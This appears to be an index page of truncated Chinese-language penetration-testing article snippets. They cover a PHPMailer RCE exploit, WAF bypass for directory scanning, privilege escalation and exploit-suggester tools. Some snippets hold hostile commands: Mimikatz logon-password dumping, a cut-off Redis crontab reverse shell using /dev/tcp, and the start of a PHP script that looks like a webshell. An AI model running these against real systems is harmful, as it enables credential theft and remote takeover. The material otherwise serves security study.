PHPMailer < 5.2.18 - Remote Code Execution (PHP)
<?php /* PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033) Discovered/Coded by: Dawid Golunski (@dawid_golunski) https://legalhackers.com Full Advisory URL: https://legalhackers.com/advi...
<?php /* PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033) Discovered/Coded by: Dawid Golunski (@dawid_golunski) https://legalhackers.com Full Advisory URL: https://legalhackers.com/advi...
用御剑的朋友都遇到过这个页面吧,装狗了开启保护就会这样 本机搭建安全狗设置发现,默认是过蜘蛛的,所以只要把http头来路改成蜘蛛的useragent就ok了 无奈御剑和wscan 都是无法设置http头的,也无法用burp做代理中转改http头 像AWVS,Burp类大型扫描工具也可以进行目录扫描,并且也可以挂代理,改http头,不过个人感觉远没有专业扫描工具来的简单 因此翻出一款老工具 DirB...
PentestBox是一款Windows平台下预配置的便携式开源渗透测试环境为什么又有一个渗透测试环境? PentestBox不同于运行在虚拟机或者双启动环境的Linux渗透测试发行版。它打包了所有的安全工具,并且可以在Windows系统中原生地运行,有效地降低了对虚拟机或者双启动环境的需求。我们发现超过50%的渗透测试发行版是运行在Windows系统下的虚拟机程序中,这激发我们创造了它。 [ 源...
星外虚拟主机跨目录读取文件漏洞,需要一定条件。 详细说明: 问题发生在以下文件,这些文件都没有严格的设置执行权限,当前的IIS用户能够顺利的利用它们执行命令: c:windows7i24IISLOG.exe c:windows7i24IISLOG2.exe c:windows7i24IISLOG3.exe c:windows7i24IISLOG4.exe c:windows7i24tool.exe...
1.记录 Mimikatz输出: C:>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir 2.将输出导入到本地文件: C:>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full...
<?php /* ============== */ error_reporting(0); ini_set('max_execution_time',0); // ------------------------------------- Some header Functions (Need to be on top) --------------------------------- ...
介绍: 在渗透测试或者漏洞评估的过程中,提权是非常重要的一步,在这一步,黑客和安全研究人员常常通过exploit,bug,错误配置来提升权限。本文的例子都是在虚拟机里测试的,不同的虚拟机可以从Vulnhub下载。 实验一:利用Linux内核漏洞提权 VulnOS version 2是VulHub上的一个Linux提权练习,当打开虚拟机后,可以看到 获取到低权限SHELL后我们通常做下...
redis的exploit,完全不需要flushall破坏数据场景,redis-cli set 1 ‘ringzero’,这样可以控制第一条记录,就能保证你的内容始终保持在最前面; 测试环境:CentOS,RHEL # 利用crontab反弹shell redis-cli flushall echo -e "nn*/1 * * * * /bin/bash -i >& /dev/tcp...
Linux_Exploit_Suggester是一款根据操作系统版本号自动查找相应提权脚本的工具,如果不带任何参数运行该脚本的话,将执行uname -r返回的操作系统发行版本,或者手工输入-k参数查找指定版本号。 例子: $ perl ./Linux_Exploit_Suggester.pl -k 3.0.0 Kernel local: 3.0.0 Possible Exploits: [+] s...
此工具是一款非常好用的Windows下提权辅助工具(已经支持Windows 10下的提权了),国内已经有许多人在用了,但是一直没有相应的中文文档,所以我特地翻译了一下,水平有限,如有错误,欢迎指出,谢谢。 描述 该工具可以将目标系统的补丁安装情况与微软的漏洞数据库进行对比,进而检测出目标系统中潜在的未修复漏洞。同时此工具还会告知用户针对于此漏洞是否有公开的exp和可用的Metasploit模块。 ...